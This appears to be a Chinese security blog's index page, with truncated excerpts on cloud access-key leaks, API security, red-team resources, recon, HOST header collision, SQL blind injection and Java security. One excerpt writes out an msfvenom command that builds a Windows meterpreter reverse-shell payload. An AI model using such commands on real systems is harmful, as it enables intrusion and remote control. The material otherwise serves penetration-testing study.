℡回眸抹去乄殘鎦、的繁星

摘要： 前言 项目中各厂商越来越趋势于使用云存储，云管理。 漏洞介绍 AK/SK（Access Key ID/Secret Access Key）即访问密钥，包含访问密钥ID（AK）和秘密访问密钥（SK）两部分，公有云通过AK识别用户的身份，通过SK对请求数据进行签名验证，用于确保请求的机密性、完整性和请求 阅读全文

摘要： 开发安全的 API 所需要核对的清单 以下是当你在设计，测试以及发布你的 API 的时候所需要核对的重要安全措施。 身份认证 [ ] 不要使用 Basic Auth ，请使用标准的认证协议（如 JWT，OAuth）。 [ ] 不要重新实现 Authentication、token generatin 阅读全文

摘要： 「声明：本博客中涉及到的相关漏洞均为官方已经公开并修复的漏洞，涉及到的安全技术也仅用于企业安全建设和安全对抗研究。本文仅限业内技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担。」 红队框架 攻击技战法 [list] 云上攻击技战法 https://hackingthe.cloud/ [d 阅读全文

摘要： 参数的猜想 1/ The scope of this program was *.███.com With a wildcard, basic recon is: Subdomain Enumeration + HTTP server probing: $ subfinder -d example[ 阅读全文

摘要： MSF命令大全详解 0x00 payload生成 windows&linux Windows： msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名 Linux: msfvenom 阅读全文

该文被密码保护。 阅读全文

摘要： https://github.com/qianniaoge/JavaSecInterview https://github.com/Maskhe/javasec https://github.com/Y4tacker/JavaSec https://github.com/search?q=javaS 阅读全文

摘要： 0x00 引言 在渗透测试中，搜集了很多IP资产，端口也开放了WEB服务，但打开总是403 404 400错误，扫目录也扫不到东西。这时候可以尝试利用HOSTS碰撞技术突破其边界对其内网系统进行攻击。 0x01 HOSTS碰撞 什么是HOSTS碰撞，当直接访问IP回显4xx错误，直接指定HOST头为 阅读全文

摘要： 涉及技能点 SQL注入基础原理 盲注常用函数及思路 burpsuite基础知识 过程记录 1.发现 在翻阅一EDU站点时，发现路径中带有明显的数字参数 好像与我们平时习惯的xxx.php?id=不同呃 2.尝试注入 按照以往习惯，先用order by探探底，结果翻车了…应该有自定义逻辑在过滤敏感关键 阅读全文

摘要： beanshell package cn.ecology; //通过maven导包；去beanshell官网下载假如lib import bsh.Interpreter; /*Interpreter * */ public class TestEval { public static void ma 阅读全文